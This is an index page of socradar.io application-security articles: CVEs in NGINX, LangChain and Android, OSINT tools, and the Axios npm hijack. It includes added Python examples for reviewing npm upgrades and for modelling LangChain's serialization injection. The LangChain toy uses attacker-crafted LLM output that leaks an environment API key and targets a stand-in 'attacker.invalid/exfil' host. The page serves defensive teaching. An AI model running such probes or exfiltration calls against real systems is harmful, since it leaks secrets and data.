appsec.fyi · Sources

socradar.io

5 curated AppSec resources from socradar.io across 5 topics on appsec.fyi.

Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-05-17.

Date Added · Resource (year) · Topic
Excerpt
2026-05-17 · CVE-2026-42945: NGINX Rewrite Heap Overflow Enables Remote DoS & Potential RCE (2026) · RCE
NGINX has a critical heap overflow vulnerability (CVE-2026-42945) in its rewrite module. The flaw allows remote attackers to trigger a denial of service (DoS) and potentially achieve remote code execution (RCE) by exploiting malformed rewrite rules. Users are strongly advised to update NGINX to a patched version.

2026-04-27 · OSINT Tools for Cybersecurity: A Practical Guide for Security Teams (2026) · OSINT
A library of OSINT tools for cybersecurity teams, categorized by function: Domain and IP Intelligence (Shodan, DNSDumpster), Email and Credential Exposure (Have I Been Pwned, Holehe), People and Social Media Intelligence (Maltego, Sherlock), Dark Web and Paste Site Monitoring (SOCRadar, IntelligenceX), and Metadata and Search Engine Intelligence (Google Hacking Database, ExifTool). It also highlights key websites such as osintframework.com and crt.sh, and details a practical investigation workflow that emphasizes framing the initial question and passive reconnaissance.

2026-04-22 · Axios npm Hijack 2026: Everything You Need to Know (2026) · Supply Chain
Analysis of the Axios npm Hijack 2026, a supply chain attack in which threat actors compromised the lead maintainer's npm account and published malicious versions of the popular JavaScript library. These versions, [email protected] and [email protected], silently installed a cross-platform RAT (SILKBELL and WAVESHAPER.V2) via a hidden dependency upon `npm install`. The attack, attributed to UNC1069, bypassed standard CI/CD security by publishing directly to the npm registry with a stolen access token, highlighting the importance of OIDC provenance and SLSA checks.

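A pre-upgrade review that looks for the signals the excerpt describes (a dependency that appears between two releases, code that runs during `npm install`, and a tarball served from somewhere other than the registry) can be scripted against the manifests and lockfile before anything is installed. The following is an added example, not code from SOCRadar or the Axios project; the package names (`example-lib`, `example-helper`), versions, manifests and lockfile entries are constructed for illustration and do not describe the real malicious releases.

```python
"""Review a dependency upgrade for supply-chain red flags before `npm install`.

Added example with constructed sample data (not the project's own code).
It compares the candidate release's manifest against the previous one,
inspects every manifest in the install set for lifecycle scripts, and checks
that every lockfile entry resolves to the expected registry.
"""

# Lifecycle scripts npm executes for a dependency during installation.
# Legitimate native modules use them too, so treat hits as "needs review".
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(manifests):
    """Map package name -> install-time scripts for every manifest that has any."""
    flagged = {}
    for name, manifest in manifests.items():
        hooks = {k: v for k, v in manifest.get("scripts", {}).items() if k in INSTALL_HOOKS}
        if hooks:
            flagged[name] = hooks
    return flagged


def new_dependencies(previous, candidate):
    """Dependencies the candidate release declares that the previous one did not."""
    def declared(manifest):
        out = {}
        for key in ("dependencies", "optionalDependencies"):
            out.update(manifest.get(key, {}))
        return out
    before, after = declared(previous), declared(candidate)
    return {name: spec for name, spec in after.items() if name not in before}


def non_registry_sources(lockfile, registry="https://registry.npmjs.org/"):
    """Lockfile (v2/v3 `packages` layout) entries not resolved from the registry."""
    flagged = {}
    for path, entry in lockfile.get("packages", {}).items():
        if path == "":  # the root project entry has no tarball
            continue
        resolved = entry.get("resolved")
        if resolved is None or not resolved.startswith(registry):
            flagged[path] = resolved
    return flagged


def review(previous, candidate, manifests, lockfile):
    """Aggregate the three checks; `needs_review` is True if any check fired."""
    findings = {
        "install_hooks": install_hooks(manifests),
        "new_dependencies": new_dependencies(previous, candidate),
        "non_registry_sources": non_registry_sources(lockfile),
    }
    findings["needs_review"] = any(
        findings[k] for k in ("install_hooks", "new_dependencies", "non_registry_sources")
    )
    return findings


# Constructed sample: a hypothetical library whose patch release pulls in a
# new helper package that carries a postinstall script and is fetched from a
# CDN instead of the registry.
PREVIOUS = {"name": "example-lib", "version": "1.4.0",
            "dependencies": {"follow-redirects": "^1.15.0"}}
CANDIDATE = {"name": "example-lib", "version": "1.4.1",
             "dependencies": {"follow-redirects": "^1.15.0", "example-helper": "^0.0.1"}}
HELPER = {"name": "example-helper", "version": "0.0.1",
          "scripts": {"postinstall": "node setup.js"}}
MANIFESTS = {"example-lib": CANDIDATE, "example-helper": HELPER}
LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "app"},
    "node_modules/example-lib": {
        "version": "1.4.1",
        "resolved": "https://registry.npmjs.org/example-lib/-/example-lib-1.4.1.tgz"},
    "node_modules/example-helper": {
        "version": "0.0.1",
        "resolved": "https://cdn.example.invalid/example-helper-0.0.1.tgz"},
}}


def sample_review():
    return review(PREVIOUS, CANDIDATE, MANIFESTS, LOCK)


if __name__ == "__main__":
    for key, value in sample_review().items():
        print(f"{key}: {value}")
```

In practice the manifests come from each package's `package.json` and the lockfile from `package-lock.json`; the check complements, rather than replaces, registry-side verification such as `npm audit signatures`, which validates registry signatures and provenance attestations for installed packages.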
2026-04-22 · CVE-2025-68664: Critical LangChain Flaw Enables Secret Extraction (2026) · Python
Writeup of CVE-2025-68664, a critical serialization injection vulnerability in LangChain Core that enables secret extraction and unintended object instantiation. The flaw stems from improper handling of the "lc" key during serialization and deserialization; it affects the Python package at versions >= 1.0.0 and < 1.2.5 and at versions < 0.3.81, and a similar issue, CVE-2025-68665, affects LangChain.js. Exploitation involves crafting attacker-controlled LLM output that masquerades as trusted serialized objects, leading to risks such as secret leakage and unintended network operations. Patched versions implement deserialization allowlists and disable environment-based secret loading by default.

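The mechanism the excerpt describes can be shown with a small model of an "lc"-keyed loader. The following is an added example and is not LangChain's code: the `Prompt` and `HttpFetcher` classes, the registry, the environment variable and the marker layout are all constructed for illustration. The vulnerable loader treats any dict carrying `"lc": 1` as a trusted marker, so attacker-chosen JSON that the application wraps in its own record is revived as a secret reference (leaking an environment value) or as a constructor call (instantiating an object with side effects). The hardened loader applies the two controls the excerpt names: a constructor allowlist and environment-backed secrets disabled by default.

```python
"""Toy model of "lc"-keyed serialization injection and its hardening.

Added example, not LangChain's implementation.  Classes, registry, markers
and the sample environment are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Any, Mapping, Optional


@dataclass
class Prompt:
    text: Any


@dataclass
class HttpFetcher:
    """Hypothetical class whose construction would perform a network request."""
    url: str

    def __post_init__(self) -> None:
        # Stand-in side effect: record the request instead of sending it.
        self.performed = f"GET {self.url}"


# Constructed registry of classes the loader knows how to instantiate.
REGISTRY = {("demo", "Prompt"): Prompt, ("demo", "HttpFetcher"): HttpFetcher}


class UnsafeDeserialization(ValueError):
    pass


def _revive(obj: Any, env: Mapping[str, str], allowed: Optional[frozenset],
            allow_env_secrets: bool) -> Any:
    """Recursively turn a serialized tree back into objects.

    The weakness: a data dict that merely *contains* "lc": 1 is indistinguishable
    from a marker the framework emitted, so untrusted content gets revived too.
    """
    if isinstance(obj, list):
        return [_revive(x, env, allowed, allow_env_secrets) for x in obj]
    if not isinstance(obj, dict):
        return obj
    if obj.get("lc") != 1:  # plain data dict: recurse into values only
        return {k: _revive(v, env, allowed, allow_env_secrets) for k, v in obj.items()}
    kind = obj.get("type")
    ident = tuple(obj.get("id", []))
    if kind == "secret":
        if not allow_env_secrets:
            raise UnsafeDeserialization(f"env-backed secret {ident} refused")
        return env[ident[0]]
    if kind == "constructor":
        if allowed is not None and ident not in allowed:
            raise UnsafeDeserialization(f"constructor {ident} not allowlisted")
        kwargs = {k: _revive(v, env, allowed, allow_env_secrets)
                  for k, v in obj.get("kwargs", {}).items()}
        return REGISTRY[ident](**kwargs)
    raise UnsafeDeserialization(f"unknown marker type {kind!r}")


def load_unsafe(obj: Any, env: Mapping[str, str]) -> Any:
    """Vulnerable pattern: every registered constructor allowed, secrets read from env."""
    return _revive(obj, env, allowed=None, allow_env_secrets=True)


def load_safe(obj: Any, env: Mapping[str, str], allowed=(), allow_env_secrets=False) -> Any:
    """Hardened pattern: explicit allowlist, env-backed secrets off unless opted in."""
    return _revive(obj, env, allowed=frozenset(allowed), allow_env_secrets=allow_env_secrets)


# Constructed scenario: the application stores the model's output inside its own
# Prompt record and round-trips that record through the serializer.
ENV = {"OPENAI_API_KEY": "sk-constructed-secret"}  # constructed sample environment

# "LLM output" chosen by an attacker: JSON that looks like framework markers.
SECRET_PROBE = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
FETCH_PROBE = {"lc": 1, "type": "constructor", "id": ["demo", "HttpFetcher"],
               "kwargs": {"url": "http://attacker.invalid/exfil"}}


def wrap_in_prompt(llm_output: Any) -> dict:
    """The application's own (legitimate) marker, with untrusted content in kwargs."""
    return {"lc": 1, "type": "constructor", "id": ["demo", "Prompt"],
            "kwargs": {"text": llm_output}}


def demo() -> dict:
    leaked = load_unsafe(wrap_in_prompt(SECRET_PROBE), ENV).text
    fetched = load_unsafe(wrap_in_prompt(FETCH_PROBE), ENV).text
    blocked = []
    for probe in (SECRET_PROBE, FETCH_PROBE):
        try:
            load_safe(wrap_in_prompt(probe), ENV, allowed={("demo", "Prompt")})
            blocked.append(False)
        except UnsafeDeserialization:
            blocked.append(True)
    return {"leaked_secret": leaked, "side_effect": fetched.performed, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The hardened loader still revives the application's own `Prompt` marker because it is on the allowlist, which is the property a fix needs: legitimate round-trips keep working while attacker-supplied markers for secrets or other constructors are refused.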
2026-04-11 · December 2025 Android Security Bulletin: Two Zero-Day Flaws Exploited (2026) · Mobile
Analysis of the December 2025 Android Security Bulletin, which details over 100 vulnerabilities. The release highlights two zero-day Framework flaws, CVE-2025-48633 (information disclosure) and CVE-2025-48572 (elevation of privilege), which are under limited, targeted exploitation across Android 13-16. The bulletin also addresses a critical Framework DoS (CVE-2025-48631), kernel privilege escalations (including pKVM and IOMMU issues), and vendor-specific flaws in Arm, Imagination GPU, MediaTek, Unisoc, and Qualcomm components.